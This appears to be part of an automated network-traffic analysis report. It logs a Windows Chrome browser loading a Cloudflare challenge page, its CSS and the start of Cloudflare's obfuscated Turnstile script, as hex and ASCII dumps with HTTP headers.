                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                        cross-origin-resource-policy: cross-origin
                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                        referrer-policy: same-origin
                        2024-07-03 12:39:12 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 39 64 36 65 66 65 31 34 61 61 64 37 32 38 66 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                        Data Ascii: Server: cloudflareCF-RAY: 89d6efe14aad728f-EWRalt-svc: h3=":443"; ma=86400
                        2024-07-03 12:39:12 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                        2024-07-03 12:39:12 UTC1369INData Raw: 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 20
                        Data Ascii: 00%; height: 100%; overflow: hidden;}body { margin: 0; background-color: #fff; padding: 0; width: 100%; height: 100%; overflow: hidden; line-height: 17px; color: #1d1f20; font-family: -apple-system, system-ui, blinkmacsystemfont,
                        2024-07-03 12:39:12 UTC1369INData Raw: 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 38 70 78 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 30 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 38 35 2c 20 30 2e 36 38 2c 20 30 2e 35 33 29 20 62 6f 74 68 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20 36 70 78 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 66 38 66 38 66 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c
                        Data Ascii: splay: flex; margin-right: 8px; border-radius: 50%; box-shadow: inset 0 0 0 #038127; width: 30px; height: 30px; animation: scale-up-center 0.6s cubic-bezier(0.55, 0.085, 0.68, 0.53) both; stroke-width: 6px; stroke: #f8f8f8; stroke-miterl
                        2024-07-03 12:39:12 UTC1369INData Raw: 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 63 62 2d 69 2c 20 2e 74 68 65 6d 65 2d 64 61 72
                        Data Ascii: ext a:hover,.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus { color: #949494;}.theme-dark .cb-lb .cb-i { border: 2px solid #dadada; background-color: #222;}.theme-dark .cb-lb input:focus ~ .cb-i, .theme-dar
                        2024-07-03 12:39:12 UTC1369INData Raw: 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 0a 2e 74 68 65
                        Data Ascii: r: #222;}.theme-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-link,.theme-dark #fr-helper-loop-link { color: #bbb;}.theme-dark #fr-helper-link:visited, .theme-dark #fr-helper-link:link,.the
                        2024-07-03 12:39:12 UTC1369INData Raw: 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 30 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 64 65 31 33 30 33 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 70 78 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 76
                        Data Ascii: #challenge-error-text { text-align: center; line-height: 10px; color: #de1303; font-size: 9px;}#challenge-overlay a,#challenge-error-text a { color: #1d1f20;}#challenge-overlay a:visited, #challenge-overlay a:link,#challenge-error-text a:v
                        2024-07-03 12:39:12 UTC1369INData Raw: 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 73 70 61 6e 2e 63 62 2d 6c 62 2d 74 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 20 20 62 61 63
                        Data Ascii: tion: underline;}.cb-lb input:focus ~ .cb-i { border: 2px solid #c44d0e;}.cb-lb input:focus ~ span.cb-lb-t { text-decoration: underline;}.cb-lb input:checked ~ .cb-i { transform: rotate(0deg) scale(1); opacity: 1; border-radius: 5px; bac
                        2024-07-03 12:39:12 UTC1369INData Raw: 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77 2d 72 65 76 65 72 73 65 20 77 72 61 70 3b 0a 20 20 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 20 31 36 70 78 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65
                        Data Ascii: top: 3px; margin-left: 0;}.size-compact #branding { display: flex; flex-flow: row-reverse wrap; place-content: center flex-start; align-items: center; margin: 5px 16px 0; padding-right: 0; text-align: right;}.size-compact #terms { te
                        2024-07-03 12:39:12 UTC1369INData Raw: 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 66 2d 73 74 61 67 65 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78
                        Data Ascii: er;}.rtl .size-compact #branding { padding-right: 0; padding-left: 0; text-align: center;}.rtl .size-compact #terms { text-align: center;}.rtl .size-compact #cf-stage { padding-right: 48px;}.rtl .size-compact #success-icon { left: 86px


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        17192.168.2.649736104.17.3.1844434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:13 UTC711OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d6efe14aad728f HTTP/1.1
                        Host: challenges.cloudflare.com
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: */*
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: script
                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/wtoc0/0x4AAAAAAAeHHZ3q51Y71L9P/light/normal
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-07-03 12:39:13 UTC331INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:13 GMT
                        Content-Type: application/javascript; charset=UTF-8
                        Content-Length: 190118
                        Connection: close
                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                        Server: cloudflare
                        CF-RAY: 89d6efe55b3b5e86-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-07-03 12:39:13 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 7a 2c 66 46 2c 66 47 2c 66 48 2c 66 4c 2c 66 4e 2c 66 4f 2c 66 50 2c 66 51 2c 66 52 2c 66 53 2c 66 54 2c 66 55 2c 66 56 2c 66 57 2c 66 58 2c 66 59 2c 66 5a 2c 67 30 2c 67 31 2c 67 32 2c 67 33 2c 67 34 2c 67 35 2c 67 36 2c 67 37 2c 67 38 2c 67 39 2c 67 61 2c 67 62 2c 67 63 2c 67 64 2c 67 65 2c 67 66 2c 67 67 2c 67 68 2c 67 69 2c 67 6a 2c 67 6b 2c 67 6c 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4b 2c 67 57 2c 68 39 2c 68 65 2c 68 66 2c 68 67 2c 68 73 2c 68 44 2c 68 48 2c
                        Data Ascii: window._cf_chl_opt.uaO=false;~function(iz,fF,fG,fH,fL,fN,fO,fP,fQ,fR,fS,fT,fU,fV,fW,fX,fY,fZ,g0,g1,g2,g3,g4,g5,g6,g7,g8,g9,ga,gb,gc,gd,ge,gf,gg,gh,gi,gj,gk,gl,gm,gn,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gG,gH,gI,gK,gW,h9,he,hf,hg,hs,hD,hH,
                        2024-07-03 12:39:13 UTC1369INData Raw: 67 2c 36 35 35 33 35 29 29 2b 36 35 35 33 35 29 25 32 35 35 29 29 29 3b 72 65 74 75 72 6e 20 69 5b 69 41 28 34 31 37 29 5d 28 27 27 29 7d 2c 66 46 5b 69 7a 28 31 39 31 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 43 2c 64 2c 65 2c 66 2c 67 29 7b 69 43 3d 69 7a 2c 64 3d 7b 7d 2c 64 5b 69 43 28 35 33 34 29 5d 3d 69 43 28 31 32 35 38 29 2c 64 5b 69 43 28 31 37 34 32 29 5d 3d 69 43 28 34 39 31 29 2c 64 5b 69 43 28 32 30 31 37 29 5d 3d 69 43 28 38 37 30 29 2c 64 5b 69 43 28 35 37 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 65 3d 64 2c 66 3d 31 2c 67 3d 31 65 33 2a 66 46 5b 69 43 28 31 36 31 32 29 5d 5b 69 43 28 31 36 34 35 29 5d 28 65 5b 69 43 28 35 37 36 29 5d 28 32 2c 66 29 2c 33 32 29 2c 66 46 5b 69 43 28 33 34
                        Data Ascii: g,65535))+65535)%255)));return i[iA(417)]('')},fF[iz(1913)]=function(iC,d,e,f,g){iC=iz,d={},d[iC(534)]=iC(1258),d[iC(1742)]=iC(491),d[iC(2017)]=iC(870),d[iC(576)]=function(h,i){return h<<i},e=d,f=1,g=1e3*fF[iC(1612)][iC(1645)](e[iC(576)](2,f),32),fF[iC(34
                        2024-07-03 12:39:13 UTC1369INData Raw: 5d 28 6a 5b 69 45 28 34 32 33 29 5d 28 27 76 5f 27 2b 66 46 5b 69 45 28 36 31 35 29 5d 5b 69 45 28 31 36 33 32 29 5d 2b 27 3d 27 2c 42 29 29 7d 63 61 74 63 68 28 43 29 7b 7d 7d 2c 66 46 5b 69 7a 28 31 30 34 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 66 2c 67 2c 68 2c 69 2c 69 46 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 76 2c 78 29 7b 66 6f 72 28 69 46 3d 69 7a 2c 6a 3d 7b 7d 2c 6a 5b 69 46 28 36 38 34 29 5d 3d 69 46 28 39 33 37 29 2c 6a 5b 69 46 28 31 38 37 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 42 2c 43 29 7b 72 65 74 75 72 6e 20 42 3e 43 7d 2c 6a 5b 69 46 28 31 35 36 32 29 5d 3d 69 46 28 37 38 34 29 2c 6a 5b 69 46 28 31 36 39 38 29 5d 3d 69 46 28 37 31 30 29 2c 6a 5b 69 46 28 31 33 32 33 29 5d 3d 69 46 28 36 30 38 29 2c 6a 5b 69 46 28 32 32 30 35
                        Data Ascii: ](j[iE(423)]('v_'+fF[iE(615)][iE(1632)]+'=',B))}catch(C){}},fF[iz(1045)]=function(e,f,g,h,i,iF,j,k,l,m,n,o,s,v,x){for(iF=iz,j={},j[iF(684)]=iF(937),j[iF(1874)]=function(B,C){return B>C},j[iF(1562)]=iF(784),j[iF(1698)]=iF(710),j[iF(1323)]=iF(608),j[iF(2205
                        2024-07-03 12:39:13 UTC1369INData Raw: 5d 3d 69 7a 28 32 32 31 39 29 2c 66 4f 5b 69 7a 28 31 37 36 31 29 5d 3d 69 7a 28 31 39 38 37 29 2c 66 4f 5b 69 7a 28 37 31 31 29 5d 3d 69 7a 28 31 39 38 37 29 2c 66 4f 5b 69 7a 28 31 37 30 30 29 5d 3d 69 7a 28 32 32 31 32 29 2c 66 4f 5b 69 7a 28 31 33 38 36 29 5d 3d 69 7a 28 37 36 39 29 2c 66 4f 5b 69 7a 28 32 32 36 35 29 5d 3d 69 7a 28 32 30 36 33 29 2c 66 4f 5b 69 7a 28 34 33 38 29 5d 3d 69 7a 28 31 36 33 39 29 2c 66 4f 5b 69 7a 28 31 36 35 36 29 5d 3d 69 7a 28 39 36 36 29 2c 66 4f 5b 69 7a 28 35 30 38 29 5d 3d 69 7a 28 31 38 31 37 29 2c 66 4f 5b 69 7a 28 33 36 36 29 5d 3d 69 7a 28 35 33 37 29 2c 66 4f 5b 69 7a 28 38 38 38 29 5d 3d 69 7a 28 31 39 36 35 29 2c 66 50 3d 7b 7d 2c 66 50 5b 69 7a 28 36 30 34 29 5d 3d 69 7a 28 31 32 30 37 29 2c 66 50 5b 69 7a
                        Data Ascii: ]=iz(2219),fO[iz(1761)]=iz(1987),fO[iz(711)]=iz(1987),fO[iz(1700)]=iz(2212),fO[iz(1386)]=iz(769),fO[iz(2265)]=iz(2063),fO[iz(438)]=iz(1639),fO[iz(1656)]=iz(966),fO[iz(508)]=iz(1817),fO[iz(366)]=iz(537),fO[iz(888)]=iz(1965),fP={},fP[iz(604)]=iz(1207),fP[iz
                        2024-07-03 12:39:13 UTC1369INData Raw: 2c 66 53 5b 69 7a 28 38 36 34 29 5d 3d 69 7a 28 31 31 31 36 29 2c 66 53 5b 69 7a 28 31 35 30 35 29 5d 3d 69 7a 28 31 33 34 38 29 2c 66 53 5b 69 7a 28 31 36 31 33 29 5d 3d 69 7a 28 31 33 35 31 29 2c 66 53 5b 69 7a 28 31 38 37 36 29 5d 3d 69 7a 28 31 34 31 37 29 2c 66 53 5b 69 7a 28 35 30 30 29 5d 3d 69 7a 28 31 32 36 36 29 2c 66 53 5b 69 7a 28 31 37 36 31 29 5d 3d 69 7a 28 37 32 35 29 2c 66 53 5b 69 7a 28 37 31 31 29 5d 3d 69 7a 28 39 36 37 29 2c 66 53 5b 69 7a 28 31 37 30 30 29 5d 3d 69 7a 28 35 36 37 29 2c 66 53 5b 69 7a 28 31 33 38 36 29 5d 3d 69 7a 28 31 32 39 31 29 2c 66 53 5b 69 7a 28 32 32 36 35 29 5d 3d 69 7a 28 31 37 35 34 29 2c 66 53 5b 69 7a 28 34 33 38 29 5d 3d 69 7a 28 31 34 32 36 29 2c 66 53 5b 69 7a 28 31 36 35 36 29 5d 3d 69 7a 28 32 32 32
                        Data Ascii: ,fS[iz(864)]=iz(1116),fS[iz(1505)]=iz(1348),fS[iz(1613)]=iz(1351),fS[iz(1876)]=iz(1417),fS[iz(500)]=iz(1266),fS[iz(1761)]=iz(725),fS[iz(711)]=iz(967),fS[iz(1700)]=iz(567),fS[iz(1386)]=iz(1291),fS[iz(2265)]=iz(1754),fS[iz(438)]=iz(1426),fS[iz(1656)]=iz(222
                        2024-07-03 12:39:13 UTC1369INData Raw: 3d 69 7a 28 32 32 38 35 29 2c 66 56 5b 69 7a 28 33 36 36 29 5d 3d 69 7a 28 31 35 33 38 29 2c 66 56 5b 69 7a 28 38 38 38 29 5d 3d 69 7a 28 31 35 31 30 29 2c 66 57 3d 7b 7d 2c 66 57 5b 69 7a 28 36 30 34 29 5d 3d 69 7a 28 31 30 35 35 29 2c 66 57 5b 69 7a 28 31 35 32 30 29 5d 3d 69 7a 28 32 32 36 37 29 2c 66 57 5b 69 7a 28 38 36 34 29 5d 3d 69 7a 28 31 36 36 38 29 2c 66 57 5b 69 7a 28 31 35 30 35 29 5d 3d 69 7a 28 31 33 36 33 29 2c 66 57 5b 69 7a 28 31 36 31 33 29 5d 3d 69 7a 28 31 39 39 34 29 2c 66 57 5b 69 7a 28 31 38 37 36 29 5d 3d 69 7a 28 31 32 36 30 29 2c 66 57 5b 69 7a 28 35 30 30 29 5d 3d 69 7a 28 39 32 37 29 2c 66 57 5b 69 7a 28 31 37 36 31 29 5d 3d 69 7a 28 31 38 39 36 29 2c 66 57 5b 69 7a 28 37 31 31 29 5d 3d 69 7a 28 31 37 36 32 29 2c 66 57 5b 69
                        Data Ascii: =iz(2285),fV[iz(366)]=iz(1538),fV[iz(888)]=iz(1510),fW={},fW[iz(604)]=iz(1055),fW[iz(1520)]=iz(2267),fW[iz(864)]=iz(1668),fW[iz(1505)]=iz(1363),fW[iz(1613)]=iz(1994),fW[iz(1876)]=iz(1260),fW[iz(500)]=iz(927),fW[iz(1761)]=iz(1896),fW[iz(711)]=iz(1762),fW[i
                        2024-07-03 12:39:13 UTC1369INData Raw: 33 29 2c 66 5a 5b 69 7a 28 31 33 38 36 29 5d 3d 69 7a 28 31 36 33 33 29 2c 66 5a 5b 69 7a 28 32 32 36 35 29 5d 3d 69 7a 28 33 36 37 29 2c 66 5a 5b 69 7a 28 34 33 38 29 5d 3d 69 7a 28 31 32 36 35 29 2c 66 5a 5b 69 7a 28 31 36 35 36 29 5d 3d 69 7a 28 31 32 35 33 29 2c 66 5a 5b 69 7a 28 35 30 38 29 5d 3d 69 7a 28 34 34 34 29 2c 66 5a 5b 69 7a 28 33 36 36 29 5d 3d 69 7a 28 35 37 30 29 2c 66 5a 5b 69 7a 28 38 38 38 29 5d 3d 69 7a 28 36 31 36 29 2c 67 30 3d 7b 7d 2c 67 30 5b 69 7a 28 36 30 34 29 5d 3d 69 7a 28 33 36 39 29 2c 67 30 5b 69 7a 28 31 35 32 30 29 5d 3d 69 7a 28 31 38 37 35 29 2c 67 30 5b 69 7a 28 38 36 34 29 5d 3d 69 7a 28 31 39 37 36 29 2c 67 30 5b 69 7a 28 31 35 30 35 29 5d 3d 69 7a 28 31 33 39 35 29 2c 67 30 5b 69 7a 28 31 36 31 33 29 5d 3d 69 7a
                        Data Ascii: 3),fZ[iz(1386)]=iz(1633),fZ[iz(2265)]=iz(367),fZ[iz(438)]=iz(1265),fZ[iz(1656)]=iz(1253),fZ[iz(508)]=iz(444),fZ[iz(366)]=iz(570),fZ[iz(888)]=iz(616),g0={},g0[iz(604)]=iz(369),g0[iz(1520)]=iz(1875),g0[iz(864)]=iz(1976),g0[iz(1505)]=iz(1395),g0[iz(1613)]=iz
                        2024-07-03 12:39:13 UTC1369INData Raw: 29 5d 3d 69 7a 28 31 38 39 33 29 2c 67 33 5b 69 7a 28 35 30 30 29 5d 3d 69 7a 28 31 30 36 32 29 2c 67 33 5b 69 7a 28 31 37 36 31 29 5d 3d 69 7a 28 33 34 39 29 2c 67 33 5b 69 7a 28 37 31 31 29 5d 3d 69 7a 28 31 33 38 35 29 2c 67 33 5b 69 7a 28 31 37 30 30 29 5d 3d 69 7a 28 32 30 33 38 29 2c 67 33 5b 69 7a 28 31 33 38 36 29 5d 3d 69 7a 28 31 37 30 39 29 2c 67 33 5b 69 7a 28 32 32 36 35 29 5d 3d 69 7a 28 31 36 32 38 29 2c 67 33 5b 69 7a 28 34 33 38 29 5d 3d 69 7a 28 34 39 32 29 2c 67 33 5b 69 7a 28 31 36 35 36 29 5d 3d 69 7a 28 31 38 30 33 29 2c 67 33 5b 69 7a 28 35 30 38 29 5d 3d 69 7a 28 39 36 35 29 2c 67 33 5b 69 7a 28 33 36 36 29 5d 3d 69 7a 28 32 32 35 35 29 2c 67 33 5b 69 7a 28 38 38 38 29 5d 3d 69 7a 28 32 30 37 38 29 2c 67 34 3d 7b 7d 2c 67 34 5b 69
                        Data Ascii: )]=iz(1893),g3[iz(500)]=iz(1062),g3[iz(1761)]=iz(349),g3[iz(711)]=iz(1385),g3[iz(1700)]=iz(2038),g3[iz(1386)]=iz(1709),g3[iz(2265)]=iz(1628),g3[iz(438)]=iz(492),g3[iz(1656)]=iz(1803),g3[iz(508)]=iz(965),g3[iz(366)]=iz(2255),g3[iz(888)]=iz(2078),g4={},g4[i
